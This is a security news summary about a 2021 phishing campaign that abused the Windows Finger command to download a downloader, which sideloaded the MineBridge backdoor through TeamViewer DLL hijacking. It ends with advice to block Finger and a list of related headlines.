Security News > 2021 > January > Windows Finger command abused by phishing to download malware
Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.
The deobfuscated command executed by the macro, shown below, uses the finger command to download a Base64 encoded certificate from a remote server and saves it as %AppData%vUCooUr.
The certificate retrieved via the finger command is a base64 encoded malware downloader malware executable.
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
As Finger is rarely used today, it is suggested that administrators block the Finger command on their network, whether through AppLocker or other methods.
News URL
Related news
- Hackers use PHP exploit to backdoor Windows systems with new malware (source)
- Novel attack on Windows spotted in phishing campaign run from and targeting China (source)
- CISA warns of Windows flaw used in infostealer malware attacks (source)
- Windows users targeted with fake human verification pages delivering malware (source)
- New Brazilian-Linked SambaSpy Malware Targets Italian Users via Phishing Emails (source)
- New Windows Malware Locks Computer in Kiosk Mode (source)